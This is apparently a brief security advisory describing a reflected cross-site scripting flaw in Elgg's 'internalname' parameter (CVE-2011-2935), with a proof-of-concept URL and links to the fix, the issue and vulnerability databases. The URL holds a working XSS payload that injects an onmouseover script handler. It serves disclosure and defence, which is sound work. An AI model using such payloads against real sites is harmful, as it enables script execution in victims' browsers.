The internalname
parameter is not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim’s browser
http://localhost/pg/embed/media?internalname=%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22
yehg.net/lab/pr0js/advisories/[elgg_1710]_xss_sqlin
github.com/Elgg/Elgg
github.com/Elgg/Elgg/commit/2843b4f846874d434a2403ac1f27e41035b45e04
github.com/Elgg/Elgg/issues/3544
nvd.nist.gov/vuln/detail/CVE-2011-2935
oss-security.openwall.narkive.com/1UH3NYx8/cve-request-elgg-1-7-10-multiple-vulnerabilities
security-tracker.debian.org/tracker/CVE-2011-2935
web.archive.org/web/20110907122607/blog.elgg.org/pg/blog/brett/read/189/elgg-1711-released